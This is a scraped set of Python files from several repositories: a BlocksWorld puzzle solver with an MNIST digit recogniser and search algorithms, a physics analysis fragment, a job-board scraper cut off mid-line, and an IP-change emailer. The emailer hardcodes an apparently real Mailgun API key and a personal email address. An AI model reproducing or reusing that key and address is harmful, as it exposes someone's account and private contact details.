syst=syst, UD=UD) self.sampleTree.addFormula(self.systVarCuts[systVarBranchName]) def processEvent(self, tree): # if current entry has not been processed yet if not self.hasBeenProcessed(tree): self.markProcessed(tree) # Nominal b = int(self.sampleTree.evaluate(self.boostedCut)) self._b(self._v(self.branchName))[0] = 1 if b > 0 else 0 # systematic variations if self.sample.isMC(): for syst in self.systematics: for UD in self.variations: systVarBranchName = self._v(self.branchName, syst, UD) b = int(self.sampleTree.evaluate(self.systVarCuts[systVarBranchName])) self._b(systVarBranchName)[0] = 1 if b > 0 else 0
Python
64
40.546875
139
/python/myutils/isBoosted.py
0.624343
0.620962
iJuanPablo/tools
refs/heads/master
""" ip_reader --------- Reads the Machine IP and emails if it has changed Mac - Linux crontab Windows: Command line as follows: schtasks /Create /SC HOURLY /TN PythonTask /TR "PATH_TO_PYTHON_EXE PATH_TO_PYTHON_SCRIPT" That will create an hourly task called 'PythonTask'. You can replace HOURLY with DAILY, WEEKLY etc. PATH_TO_PYTHON_EXE will be something like: C:\python25\python.exe. Otherwise you can open the Task Scheduler and do it through the GUI. Hope this helps. """ import collections import base64 import json from httplib import HTTPSConnection from urllib import urlencode from urllib2 import urlopen def encode_params(data): """Encode parameters in a piece of data. Will successfully encode parameters when passed as a dict or a list of 2-tuples. Order is retained if data is a list of 2-tuples but arbitrary if parameters are supplied as a dict. """ if isinstance(data, (str, bytes)): return data elif hasattr(data, 'read'): return data elif hasattr(data, '__iter__'): result = [] for k, vs in to_key_val_list(data): if isinstance(vs, basestring) or not hasattr(vs, '__iter__'): vs = [vs] for v in vs: if v is not None: result.append( (k.encode('utf-8') if isinstance(k, str) else k, v.encode('utf-8') if isinstance(v, str) else v)) return urlencode(result, doseq=True) else: return data def to_key_val_list(value): """Take an object and test to see if it can be represented as a dictionary. If it can be, return a list of tuples, e.g., :: >>> to_key_val_list([('key', 'val')]) [('key', 'val')] >>> to_key_val_list({'key': 'val'}) [('key', 'val')] >>> to_key_val_list('string') ValueError: cannot encode objects that are not 2-tuples. :rtype: list """ if value is None: return None if isinstance(value, (str, bytes, bool, int)): raise ValueError('cannot encode objects that are not 2-tuples') if isinstance(value, collections.Mapping): value = value.items() return list(value) file_path = 'ip.txt' my_ip = json.load(urlopen('https://api.ipify.org/?format=json'))['ip'] try: with open(file_path, 'r') as the_file: file_ip = the_file.read() except: file_ip = u'' if my_ip != file_ip: http = 'http://' url = 'api.mailgun.net' request = '/v3/sandboxee586e52376a457d8b274c437718a56e.mailgun.org/messages' key = 'key-29caea072852af2816e0b02f6733b751' base64string = base64.encodestring('api:'+key).replace('\n', '') headers = {'Authorization': 'Basic %s' % base64string, 'content-type': 'application/x-www-form-urlencoded'} payload = {"from": "PostMaster <postmaster@sandboxee586e52376a457d8b274c437718a56e.mailgun.org>", "to": "Juan Pablo <jp.urzua.t@gmail.com>", "subject": "La IP de la oficina ha cambiado!", "text": "La nueva IP es: " + my_ip} body = encode_params(payload) http_connection = HTTPSConnection(url) http_connection.request(method="POST", url=request, body=body, headers=headers) response = json.loads(http_connection.getresponse().read()) print response if response['message'] == 'Queued. Thank you.': with open(file_path, 'w') as the_file: the_file.write(my_ip) print "Escrito" else: print 'Same IP'
Python
123
26.975609
99
/ip_reader.py
0.604705
0.592797
DiegoArcelli/BlocksWorld
refs/heads/main
import numpy as np import matplotlib.pyplot as plt from keras.datasets import mnist from keras.layers import Conv2D from keras.layers import MaxPool2D from keras.layers import Flatten from keras.layers import Dense from keras.layers import Dropout from keras import Sequential # file per allenare e salvare la rete neurale che effettua il riconoscimento delle cifre # il modello viene allenato sul dataset del MNIST BATCH_SIZE = 64 EPOCHS = 10 # si estraggono e si (x_train, y_train), (x_test, y_test) = mnist.load_data() # si aggiunge la dimensione del canale e si normalizza il valore dei pixel tra 0 e 1 x_train = np.expand_dims(x_train, -1) x_train = x_train / 255 x_test = np.expand_dims(x_test, -1) x_test = x_test / 255 # definizione del modello model = Sequential() model.add(Conv2D(filters=24, kernel_size=(3, 3), activation="relu")) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(0.5)) model.add(Conv2D(filters=36, kernel_size=(3, 3))) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(0.5)) model.add(Flatten()) model.add(Dense(128, activation="relu")) model.add(Dense(10, activation="softmax")) model.predict(x_train[[0]]) model.summary() model.compile(optimizer="adam", loss='sparse_categorical_crossentropy', metrics=['accuracy']) # allenamento del modello history = model.fit(x_train, y_train, batch_size=BATCH_SIZE, epochs=EPOCHS, validation_data=(x_test, y_test)) # calcolo della precisione e dell'errore nel validation set test_loss, test_acc = model.evaluate(x_test, y_test) print('Test loss', test_loss) print('Test accuracy:', test_acc) # plot dei grafici relativi all'andamento di accuracy e loss plt.plot(history.history['accuracy']) plt.plot(history.history['val_accuracy']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Val'], loc='upper left') plt.show() plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') plt.legend(['Train', 'Val'], loc='upper left') plt.show() model.save("./model/model.h5")
Python
72
28.333334
109
/cnn.py
0.725852
0.705492
DiegoArcelli/BlocksWorld
refs/heads/main
import tkinter as tk from tkinter.filedialog import askopenfilename from PIL import Image, ImageTk from load_state import prepare_image from utils import draw_state from blocks_world import BlocksWorld from search_algs import * # file che contiene l'implementazione dell'interfaccia grafica per utilizzare il programma class Window(tk.Frame): def __init__(self, master=None): super().__init__(master) self.master = master self.pack() self.initial_state = None self.goal_state = None self.create_widgets() self.create_images("insert_image.png", "insert_image.png") def create_widgets(self): initial_label = tk.Label(self, text = "Seleziona stato iniziale:") goal_label = tk.Label(self, text = "Seleziona stato finale:") initial_label.grid(row = 0, column = 0, padx = 10, pady = 10) goal_label.grid(row = 0, column = 2, padx = 10, pady = 10) initial_button = tk.Button(self, text="Seleziona file", command=self.open_initial) goal_button = tk.Button(self, text="Seleziona file", command=self.open_goal) initial_button.grid(row = 1, column = 0, padx = 10, pady = 10) goal_button.grid(row = 1, column = 2, padx = 10, pady = 10) alg_label = tk.Label(self, text = "Seleziona algoritmo di ricerca:") alg_label.grid(row = 0, column = 1, padx = 10, pady = 10) frame = tk.Frame(self) frame.grid(row = 1, column = 1, padx = 10, pady = 10) self.selected = tk.StringVar(self) self.selected.set("BFS") select_alg_menu = tk.OptionMenu(frame, self.selected, "BFS", "DFS", "IDS", "UCS", "A*", "RBFS", command=self.read_algorithm).pack() start_button = tk.Button(frame, text="Start search", command=self.start_search).pack() def create_images(self, initial, goal): self.initial_image_path = initial self.initial_image = ImageTk.PhotoImage(Image.open("./images/" + initial).resize((300, 300))) initial_image_label = tk.Label(self, image=self.initial_image) initial_image_label.grid(row = 2, column = 0, padx = 10, pady = 10) self.goal_image_path = goal self.goal_image = ImageTk.PhotoImage(Image.open("./images/" + goal).resize((300, 300))) goal_image_label = tk.Label(self, image=self.goal_image) goal_image_label.grid(row = 2, column = 2, padx = 10, pady = 10) def open_initial(self): self.initial_file = askopenfilename() if self.initial_file == (): return self.initial_state = prepare_image(self.initial_file, False) print(self.initial_state) draw_state(self.initial_state, "initial") self.create_images("/temp/initial.jpg", self.goal_image_path) def read_algorithm(self, alg): return alg def open_goal(self): self.goal_file = askopenfilename() if self.goal_file == (): return self.goal_state = prepare_image(self.goal_file, False) print(self.goal_state) draw_state(self.goal_state, "goal") self.create_images(self.initial_image_path, "/temp/goal.jpg") def start_search(self): if self.goal_state is None and self.initial_state is None: return alg = self.selected.get() problem = BlocksWorld(self.initial_state, self.goal_state) print("Inizio ricerca:") if alg == "BFS": problem.solution(graph_bfs(problem).solution()) if alg == "A*": problem.solution(a_star(problem, lambda n: problem.misplaced_blocks(n)).solution()) if alg == "DFS": problem.solution(graph_dfs(problem).solution()) if alg == "IDS": problem.solution(ids(problem).solution()) if alg == "RBFS": problem.solution(rbfs(problem, lambda n: problem.misplaced_blocks(n)).solution()) if alg == "UCS": problem.solution(a_star(problem, lambda n: problem.depth(n)).solution()) root = tk.Tk() root.title("Blocks World") root.resizable(0, 0) app = Window(master=root) app.mainloop()
Python
110
36.536366
139
/launch.py
0.619186
0.604167
DiegoArcelli/BlocksWorld
refs/heads/main
import heapq import functools import numpy as np import cv2 as cv import matplotlib.pyplot as plt class PriorityQueue: """A Queue in which the minimum (or maximum) element (as determined by f and order) is returned first. If order is 'min', the item with minimum f(x) is returned first; if order is 'max', then it is the item with maximum f(x). Also supports dict-like lookup.""" def __init__(self, order='min', f=lambda x: x): self.heap = [] if order == 'min': self.f = f elif order == 'max': # now item with max f(x) self.f = lambda x: -f(x) # will be popped first else: raise ValueError("Order must be either 'min' or 'max'.") def append(self, item): """Insert item at its correct position.""" heapq.heappush(self.heap, (self.f(item), item)) def extend(self, items): """Insert each item in items at its correct position.""" for item in items: self.append(item) def pop(self): """Pop and return the item (with min or max f(x) value) depending on the order.""" if self.heap: return heapq.heappop(self.heap)[1] else: raise Exception('Trying to pop from empty PriorityQueue.') def __len__(self): """Return current capacity of PriorityQueue.""" return len(self.heap) def __contains__(self, key): """Return True if the key is in PriorityQueue.""" return any([item == key for _, item in self.heap]) def __getitem__(self, key): """Returns the first value associated with key in PriorityQueue. Raises KeyError if key is not present.""" for value, item in self.heap: if item == key: return value raise KeyError(str(key) + " is not in the priority queue") def __delitem__(self, key): """Delete the first occurrence of key.""" try: del self.heap[[item == key for _, item in self.heap].index(True)] except ValueError: raise KeyError(str(key) + " is not in the priority queue") heapq.heapify(self.heap) def get_item(self, key): """Returns the first node associated with key in PriorityQueue. Raises KeyError if key is not present.""" for _, item in self.heap: if item == key: return item raise KeyError(str(key) + " is not in the priority queue") def is_in(elt, seq): """Similar to (elt in seq), but compares with 'is', not '=='.""" return any(x is elt for x in seq) def memoize(fn, slot=None, maxsize=32): """Memoize fn: make it remember the computed value for any argument list. If slot is specified, store result in that slot of first argument. If slot is false, use lru_cache for caching the values.""" if slot: def memoized_fn(obj, *args): if hasattr(obj, slot): return getattr(obj, slot) else: val = fn(obj, *args) setattr(obj, slot, val) return val else: @functools.lru_cache(maxsize=maxsize) def memoized_fn(*args): return fn(*args) return memoized_fn def draw_state(state, file_path): blocks = [*state[0:-1]] w = state[-1] blocks.sort(key=lambda l: l[1], reverse=True) h = blocks[0][1] image = np.zeros(((h+1)*100, w*100), np.uint8) for block in blocks: n, i, j = block i = h - i digit = cv.imread("./images/digits/" + str(n) + ".jpg", 0) digit = cv.resize(digit, (100, 100)) image[i*100:i*100 + 100, j*100:j*100 + 100] = ~digit size = (len(state) - 1)*100 padded = np.zeros((size, w*100), np.uint8) padded[size - (h+1)*100 : size, :] = image h = len(state) - 1 bg = np.zeros((h*100 + 40, w*100 + 40), np.uint8) bg[20: h*100 + 20, 20: w*100 + 20] = padded bg[0:10, :] = 255 bg[h*100 + 30 : h*100 + 40, :] = 255 bg[:, 0:10] = 255 bg[h*100 + 30 : h*100 + 40, :] = 255 bg[:,w*100 + 30 : w*100 + 40] = 255 w, h = (w*100 + 40, h*100 + 40) l = max(w, h) adjust = np.zeros((l, l), np.uint8) d_w = (l - w) // 2 d_h = (l - h) // 2 adjust[d_h: d_h + h, d_w: d_w + w] = bg cv.imwrite("./images/temp/" + str(file_path) + ".jpg", ~adjust)
Python
127
33.3937
80
/utils.py
0.555301
0.522098
DiegoArcelli/BlocksWorld
refs/heads/main
from aima3.search import * from utils import * from collections import deque from blocks_world import BlocksWorld import sys # file che contiene le implementazioni degli algoritmi di ricerca node_expanded = 0 # numero di nodi espansi durante la ricerca max_node = 0 # massimo numero di nodi presenti nella frontiera durante la ricerca f_dim = 0 # dimensione della frontiera in un dato momento total_node = 0 def init_param(): global node_expanded, total_node, max_node, f_dim node_expanded = 0 max_node = 0 total_node = 0 f_dim = 0 def print_param(): print(f"Nodi espansi: {node_expanded}") print(f"Max dimensione della frontiera: {max_node}") print(f"Dim media della frontiera: {int(total_node/node_expanded)}") # def get_item(queue, key): # """Returns the first node associated with key in PriorityQueue. # Raises KeyError if key is not present.""" # for _, item in queue.heap: # if item == key: # return item # raise KeyError(str(key) + " is not in the priority queue") def show_solution(name_algo, node): try: print(name_algo + ":", node.solution()) except: if type(Node) == str: print(name_algo + ":", node) else: print(name_algo + ":", "No solution found") # Graph Breadth First Search def graph_bfs(problem): global node_expanded, total_node, max_node, f_dim init_param() frontier = deque([Node(problem.initial)]) f_dim += 1 explored = set() while frontier: node_expanded += 1 total_node += f_dim node = frontier.popleft() f_dim -= 1 explored.add(node.state) if problem.goal_test(node.state): # print(node_expanded) print_param() return node for child_node in node.expand(problem): if child_node.state not in explored and child_node not in frontier: f_dim += 1 max_node = f_dim if f_dim > max_node else max_node frontier.append(child_node) # Graph Depth First Search def graph_dfs(problem): global node_expanded, total_node, max_node, f_dim init_param() frontier = deque([Node(problem.initial)]) f_dim += 1 explored = set() while frontier: total_node += f_dim node = frontier.pop() node_expanded += 1 f_dim -= 1 if problem.goal_test(node.state): print_param() return node explored.add(node.state) for child_node in node.expand(problem): if child_node.state not in explored and child_node not in frontier: f_dim += 1 max_node = f_dim if f_dim > max_node else max_node frontier.append(child_node) # Uniform Cost Search def ucs(problem, f): global node_expanded, total_node, max_node, f_dim init_param() if problem.goal_test(problem.initial): return Node(problem.initial) f = memoize(f, 'f') node_expanded += 1 frontier = PriorityQueue('min', f) frontier.append(Node(problem.initial)) f_dim += 1 explored = set() while frontier: total_node += f_dim node_expanded += 1 node = frontier.pop() f_dim -= 1 # print(node, f(node)) if problem.goal_test(node.state): print_param() return node explored.add(node.state) for child in node.expand(problem): if child.state not in explored and child not in frontier: f_dim += 1 frontier.append(child) max_node = f_dim if f_dim > max_node else max_node elif child in frontier: next_node = frontier.get_item(child) if f(child) < f(next_node): del frontier[next_node] frontier.append(child) # Depth Limited Search def dls(problem, limit): def recursive_dls(problem, node, limit): global node_expanded, total_node, max_node, f_dim node_expanded += 1 total_node += f_dim if problem.goal_test(node.state): return node elif limit == 0: return 'cutoff' cutoff_occurred = False for child_node in node.expand(problem): f_dim+=1 max_node = f_dim if f_dim > max_node else max_node result = recursive_dls(problem, child_node, limit-1) f_dim -= 1 if result == 'cutoff': cutoff_occurred = True elif result is not None: return result return 'cutoff' if cutoff_occurred else None return recursive_dls(problem, Node(problem.initial), limit) # Iterative Deepening Search def ids(problem): global node_expanded, total_node, max_node, f_dim init_param() prevexp = 0 for depth in range(sys.maxsize): f_dim += 1 result = dls(problem, depth) print(node_expanded - prevexp) prevexp = node_expanded f_dim = 0 if result != 'cutoff': print_param() return result return None # A* def a_star(problem: BlocksWorld, h=None): global node_expanded h = memoize(h or problem.h) return ucs(problem, lambda n: problem.depth(n) + h(n)) # Recursive Best First Search def rbfs(problem, h): global node_expanded, total_node, max_node, f_dim init_param() h = memoize(h or problem.h, 'h') g = memoize(lambda n: problem.depth(n), 'g') f = memoize(lambda n: g(n) + h(n), 'f') def rbfs_search(problem, node, f_limit=np.inf): global node_expanded, total_node, max_node, f_dim node_expanded += 1 if problem.goal_test(node.state): print_param() return node, 0 successors = [*node.expand(problem)] f_dim += len(successors) total_node += f_dim max_node = f_dim if f_dim > max_node else max_node if len(successors) == 0: return None, np.inf for child in successors: child.f = max(f(child), node.f) while True: successors.sort(key=lambda x: x.f) best = successors[0] if best.f > f_limit: f_dim -= len(successors) return None, best.f alt = successors[1].f if len(successors) > 1 else np.inf # importante, sovrascrivere best.f result, best.f = rbfs_search(problem, best, min(f_limit, alt)) # return result if result is not None: f_dim -= len(successors) return result, best.f node = Node(problem.initial) f(node) f_dim += 1 return rbfs_search(problem, node)[0]
Python
228
28.666666
81
/search_algs.py
0.57371
0.568091
DiegoArcelli/BlocksWorld
refs/heads/main
from aima3.search import * from utils import * import numpy as np import cv2 as cv import matplotlib.pyplot as plt # file che contine l'implementazione del problema basata con AIMA class BlocksWorld(Problem): def __init__(self, initial, goal): super().__init__(initial, goal) # restituisce il numero di blocchi def get_blocks_number(self): return len(self.initial) # restituisce la lista delle possibili azioni nello stato corrente def actions(self, state): blocks = [*state[0:-1]] size = state[-1] columns = {} tops = [] for block in blocks: n, i, j = block if j not in columns: columns[j] = (n, i, j) else: if i > columns[j][1]: columns[j] = (n, i, j) for col in columns: tops.append(columns[col]) actions = [] for block in tops: n, i, j = block for col in range(size): if col != j: if col in columns: actions.append((n, columns[col][1]+1, col)) else: actions.append((n, 0, col)) return actions # def result(self, state, actions): blocks = [*state[0:-1]] size = state[-1] to_delete = () for block in blocks: if block[0] == actions[0]: to_delete = block blocks.remove(to_delete) blocks.append((actions)) blocks.append(size) return tuple(blocks) # verifica se lo stato passato è lo stato finale def goal_test(self, state): op_1 = [*state[0:-1]] op_2 = [*self.goal[0:-1]] op_1.sort(key=lambda l: l[0]) op_2.sort(key=lambda l: l[0]) return str(op_1) == str(op_2) # restituisce i blocchi che possono essere spostati nello stato che viene passato def get_movable(self, state): blocks = [*state[0:-1]] size = state[-1] columns = {} tops = [] for block in blocks: n, i, j = block if j not in columns: columns[j] = (n, i, j) else: if i > columns[j][1]: columns[j] = (n, i, j) for col in columns: tops.append(columns[col]) return tops # euristica che calcola il numero di blocchi in posizione errata def misplaced_blocks(self, node): blocks = [*node.state[0:-1]] target = [*self.goal[0:-1]] target.sort(key=lambda l: l[0]) value = 0 for block in blocks: n, i, j = block if target[n-1][1:3] != (i, j): value += 1 # if block not in self.get_movable(node.state): # value += 1 return value # ritorna la profondità di un nodo nell'albero di ricerca def depth(self, node): return node.depth # stampa la lista delle azioni che portano dallo stato iniziale allo stato finale def solution(self, actions, output=True): if len(actions) is None: return state = self.initial successor = None n = 1 print("Lunghezza soluzione: " + str(len(actions))) for action in actions: print(action) successor = self.result(state, action) if output: figue_1 = self.draw_state(state) figue_2 = self.draw_state(successor) _, axarr = plt.subplots(1, 2) axarr[0].imshow(figue_1, cmap=plt.cm.binary) axarr[0].set_xticks([]) axarr[0].set_yticks([]) axarr[0].set_xlabel(f"\nStato {n}") axarr[1].imshow(figue_2, cmap=plt.cm.binary) axarr[1].set_xticks([]) axarr[1].set_yticks([]) axarr[1].set_xlabel(f"\nStato {n+1}") figManager = plt.get_current_fig_manager() figManager.full_screen_toggle() plt.show() state = successor n += 1 # metodo che fornisce una rappresentazione grafica dello stato che gli viene passato def draw_state(self, state): blocks = [*state[0:-1]] w = state[-1] blocks.sort(key=lambda l: l[1], reverse=True) h = blocks[0][1] image = np.zeros(((h+1)*100, w*100), np.uint8) for block in blocks: n, i, j = block i = h - i digit = cv.imread("./images/digits/" + str(n) + ".jpg", 0) digit = cv.resize(digit, (100, 100)) image[i*100:i*100 + 100, j*100:j*100 + 100] = ~digit size = (len(state) - 1)*100 adjust = np.zeros((size, w*100), np.uint8) adjust[size - (h+1)*100 : size, :] = image return adjust
Python
154
30.805195
88
/blocks_world.py
0.502348
0.48009
DiegoArcelli/BlocksWorld
refs/heads/main
from PIL import Image, ImageTk from load_state import prepare_image from utils import draw_state from blocks_world import BlocksWorld from search_algs import * import argparse from inspect import getfullargspec # file che definisce lo script da linea di comando per utilizzare il programma if __name__ == "__main__": search_algs = { "astar": a_star, "ucs": ucs, "rbfs": rbfs, "bfs": graph_bfs, "dfs": graph_dfs, "ids": ids } parser = argparse.ArgumentParser(description="Blocks World") parser.add_argument("--initial", "-i", type=str, default=None, required=True, help="The image representing the initial state") parser.add_argument("--goal", "-g", type=str, default=None, required=True, help="The image representing the goal state") parser.add_argument("--algorithm", "-a", type=str, default=None, required=True, help="The search algorithm used") parser.add_argument("--debug", "-d", default=False, required=False, action='store_true', help="Shows the steps of the image processing") parser.add_argument("--output", "-o", default=False, required=False, action='store_true', help="The solution is printed graphically") args = vars(parser.parse_args()) initial_state_path = args["initial"] goal_state_path = args["goal"] search_alg = args["algorithm"] debug = args["debug"] output = args["output"] initial_state = prepare_image(initial_state_path, debug) goal_state = prepare_image(goal_state_path, debug) print(initial_state) print(goal_state) functions = { "ucs": lambda n: problem.depth(n), "astar": lambda n: problem.misplaced_blocks(n), "rbfs": lambda n: problem.misplaced_blocks(n) } problem = BlocksWorld(initial_state, goal_state) if len(getfullargspec(search_algs[search_alg]).args) == 2: problem.solution(search_algs[search_alg](problem, functions[search_alg]).solution(), output) else: problem.solution(search_algs[search_alg](problem).solution(), output)
Python
53
37.792454
140
/main.py
0.671533
0.671046
DiegoArcelli/BlocksWorld
refs/heads/main
import cv2 as cv import numpy as np import matplotlib.pyplot as plt import glob from tensorflow import keras from math import ceil deteced = [np.array([]) for x in range(6)] # lista che contiene le immagini delle cifre poisitions = [None for x in range(6)] # lista che contiene la posizione delle cifre nell'immagine debug_mode = False model = keras.models.load_model("./model/model.h5") # carica il modello allenato sul datase del MNIST # funzione che si occupa del riconoscimento della cifra presente nell'immagine # che gli viene passato come parametro def predict(image): h, w = image.shape l = int(max(image.shape)*1.2) n_h = int((l - h)/2) n_w = int((l - w)/2) img = np.zeros((l, l), np.uint8) img[n_h : n_h + h, n_w : n_w + w] = image img = (img / 255).astype('float64') img = cv.resize(img, (28, 28), interpolation = cv.INTER_AREA) _in = np.array([img]) _in = np.expand_dims(_in, -1) digit = np.argmax(model.predict(_in)) if debug_mode: print(digit) show(img) return digit - 1 if digit > 0 else -1 # stampa a schermo l'immagine che gli veiene passata come parametro def show(img): figManager = plt.get_current_fig_manager() figManager.full_screen_toggle() plt.xticks([]) plt.yticks([]) plt.imshow(img) plt.show() # prime modifiche all'immagine che consistono nell'applicazione di blur def preprocess(image): image = cv.medianBlur(image, 3) image = cv.GaussianBlur(image, (3, 3), 0) return 255 - image def postprocess(image): image = cv.medianBlur(image, 5) image = cv.medianBlur(image, 5) kernel = np.ones((3, 3), np.uint8) image = cv.morphologyEx(image, cv.MORPH_OPEN, kernel) kernel = np.ones((3, 3), np.uint8) image = cv.erode(image, kernel, iterations=2) return image def get_block_index(image_shape, yx, block_size): y = np.arange(max(0, yx[0]-block_size), min(image_shape[0], yx[0]+block_size)) x = np.arange(max(0, yx[1]-block_size), min(image_shape[1], yx[1]+block_size)) return np.meshgrid(y, x) def adaptive_median_threshold(img_in): med = np.median(img_in) threshold = 40 img_out = np.zeros_like(img_in) img_out[img_in - med < threshold] = 255 return img_out def block_image_process(image, block_size): out_image = np.zeros_like(image) for row in range(0, image.shape[0], block_size): for col in range(0, image.shape[1], block_size): idx = (row, col) block_idx = get_block_index(image.shape, idx, block_size) out_image[block_idx] = adaptive_median_threshold(image[block_idx]) return out_image def clean(image): contours, hierarchy = cv.findContours( image, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) for contour in contours: approx = cv.approxPolyDP( contour, 0.001 * cv.arcLength(contour, True), True) x, y, w, h = cv.boundingRect(approx) if search_noise(contour, approx, image.shape[::-1]): cv.drawContours(image, [approx], 0, 255, -1) return image def search_noise(contour, approx, image_size): i_h, i_w = image_size x, y, w, h = cv.boundingRect(approx) image_area = i_w*i_h if cv.contourArea(contour) >= image_area/1000: return False if w >= i_w/50 or h >= i_h/50: return False return True def find_digits(image, org_image, org): contours, hierarchy = cv.findContours(image, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) i = 0 for contour in contours: approx = cv.approxPolyDP(contour, 0.001 * cv.arcLength(contour, True), True) x, y, w, h = cv.boundingRect(approx) if hierarchy[0][i][3] == -1: prev = predict(org_image[y:y+h, x:x+w]) if prev != -1: deteced[prev] = org[y:y+h, x:x+w] poisitions[prev] = (x, y, x + w, y + h) i += 1 # funzione che individua il box che contiene i blocchi ed individua le cifre def find_box(image): o_h, o_w = image.shape[0:2] contours, hierarchy = cv.findContours( image, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) contours.sort(reverse=True, key=lambda c: cv.contourArea(c)) contour = contours[1] approx = cv.approxPolyDP( contour, 0.001 * cv.arcLength(contour, True), True) x, y, w, h = cv.boundingRect(approx) box = (x, y, x + w, y + h) img = image[y:y+h, x:x+w] sub = img.copy() bg = ~np.zeros((h + 50, w + 50), np.uint8) bg[25: 25 + h, 25: 25 + w] = img img = bg i = 0 i_h, i_w = img.shape[0:2] tot = np.zeros(shape=(i_h, i_w)) if debug_mode: print(image) contours, hierarchy = cv.findContours(img, cv.RETR_TREE, cv.CHAIN_APPROX_NONE) for contour in contours: approx = cv.approxPolyDP( contour, 0.001 * cv.arcLength(contour, True), True) if hierarchy[0][i][3] == 0: cv.drawContours(tot, [approx], 0, 255, -1) if hierarchy[0][i][3] == 1: cv.drawContours(tot, [approx], 0, 0, -1) i += 1 tot = tot[25: 25 + h, 25: 25 + w] kernel = np.ones((5, 5), np.uint8) tot = cv.dilate(tot, kernel, iterations=3) tot = tot.astype('uint32') sub = sub.astype('uint32') res = sub + tot res = np.where(res == 0, 255, 0) result = np.zeros((o_h, o_w), np.uint8) result[y:y+h, x:x+w] = res if debug_mode: show(result) return (result, box) def get_block_borders(dims, image): x_i, y_i, x_f, y_f = dims kernel = np.ones((5, 5), np.uint8) image = cv.erode(image, kernel, iterations=1) y_m = (y_f + y_i) // 2 x_m = (x_f + x_i) // 2 t = x_i - 1 while image[y_m, t] != 255: t-=1 x_i = t t = x_f + 1 while image[y_m, t] != 255: t+=1 x_f = t t = y_i - 1 while image[t, x_m] != 255: t-=1 y_i = t t = y_f + 1 while image[t, x_m] != 255: t+=1 y_f = t return (x_i, y_i, x_f, y_f) def process_image_file(filename): global deteced, poisitions, explored, debug_mode block_size = 50 deteced = [np.array([]) for x in range(6)] poisitions = [None for x in range(6)] explored = [] image_in = cv.cvtColor(cv.imread(filename), cv.COLOR_BGR2GRAY) if debug_mode: show(image_in) image_in_pre = preprocess(image_in) image_out = block_image_process(image_in_pre, block_size) image_out = postprocess(image_out) image_out = clean(image_out) if debug_mode: show(image_out) digits, box = find_box(image_out) find_digits(digits, ~image_out, image_in) for i in range(6): if deteced[i].size > 0: image = deteced[i] x, y, w, h = get_block_borders(poisitions[i], ~image_out) poisitions[i] = (x, y, w, h) cv.rectangle(image_in, (x, y), (w, h), 255, 2) if debug_mode: show(image_in) return box def check_intersection(values): v1_i, v1_f, v2_i, v2_f = values v2_m = (v2_i + v2_f) // 2 if v1_i < v2_m and v1_f > v2_m: return True return False def create_state(poisitions, box): cols = [[] for x in range(6)] mean_points = [] for i in range(6): if poisitions[i] is not None: x1_i, y1_i, x1_f, y1_f = poisitions[i] mean_points.append(((x1_f + x1_i) // 2, ((y1_f + y1_i) // 2))) c = [i+1] for j in range(6): if poisitions[j] is not None and j != i: x2_i, y2_i, x2_f, y2_f = poisitions[j] if check_intersection((x1_i, x1_f, x2_i, x2_f)): c.append(j+1) c.sort() cols[i] = tuple([*c]) else: cols[i] = () temp_cols = list(set(tuple(cols))) if () in temp_cols: temp_cols.remove(()) cols = [] for t_col in temp_cols: col = list(t_col) col.sort(reverse=True, key=lambda e: mean_points[e-1][1]) cols.append(tuple(col)) cols.sort(key=lambda e: mean_points[e[0]-1][0]) bottoms = [col[0] for col in cols] distances = [] xb_i, _, xb_f, _ = box x_i, _, x_f, _ = poisitions[bottoms[0]-1] dist = abs(x_i - xb_i) dist = dist / (x_f - x_i) distances.append(dist) for i in range(len(bottoms)-1): x1_i, _, x1_f, _ = poisitions[bottoms[i]-1] x2_i, _, _, _ = poisitions[bottoms[i+1]-1] dist = abs(x2_i - x1_f) dist = dist / (x1_f - x1_i) distances.append(dist) x_i, _, x_f, _ = poisitions[bottoms[-1]-1] dist = abs(xb_f - x_f) dist = dist / (x_f - x_i) distances.append(dist) for i in range(len(distances)): dist = distances[i] if dist - int(dist) >= 0.5: distances[i] = int(dist) + 1 else: distances[i] = int(dist) n = sum(distances) + len(cols) i = distances[0] state = [] pos = 1 for col in cols: j = 0 for block in col: state.append((block, j, i)) j += 1 i += distances[pos] + 1 pos += 1 state.append(n) return tuple(state) def prepare_image(file_path, debug): global debug_mode debug_mode = True if debug else False box = process_image_file(file_path) state = create_state(poisitions, box) return state
Python
308
29.344156
101
/load_state.py
0.561845
0.535202
otar/python-weworkremotely-bot
refs/heads/master
import sys, datetime, requests from bs4 import BeautifulSoup from pymongo import MongoClient # Fetch website HTML and parse jobs data out of it def fetch(keyword): SEARCH_URL = 'https://weworkremotely.com/jobs/search?term=%s' CSS_QUERY = '#category-2 > article > ul > li a' response = requests.get(SEARCH_URL % (keyword), timeout=10) if response.status_code != requests.codes.ok: return False html = BeautifulSoup(response.text) jobs = html.select(CSS_QUERY) # If there's only one item in the list, then it's just a category if len(jobs) <= 1: return False # We don't need the category... del jobs[-1] months = { 'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12' }; current_date = datetime.datetime.now() result = [] for job in jobs: job_id = job['href'].strip('/').split('/')[1].strip() if not job_id: continue job_details = job.find_all('span') # We should have exactly 3 "span" tags if len(job_details) != 3: continue date_parts = ' '.join(job_details[2].string.split()).split(' ') # Ugly hack, I know... but works perfectly if len(date_parts[1]) == 1: date_parts[1] = str('0' + date_parts[1]) result.append({ 'job_id': job_id, 'title': job_details[1].string.strip(), 'company': job_details[0].string.strip(), 'date': '%s-%s-%s' % (current_date.year, months[date_parts[0]], date_parts[1]) }) return result # Insert jobs in the database def insert(jobs): db = MongoClient() for job in jobs: db.we_work_remotely.jobs.update( { 'job_id': job['job_id'] }, { '$setOnInsert': job }, True ) # Helper function to terminate program execution gracefully def exit_program(message='You shall not pass!'): print(message) sys.exit(0) # Handle search keyword argument SEARCH_TERM = 'php' if len(sys.argv) == 2: SEARCH_TERM = sys.argv[1].strip() # Main script controller def main(): try: jobs = fetch(SEARCH_TERM) if jobs == False: exit_program() insert(jobs) except: exit_program('Blame it on a 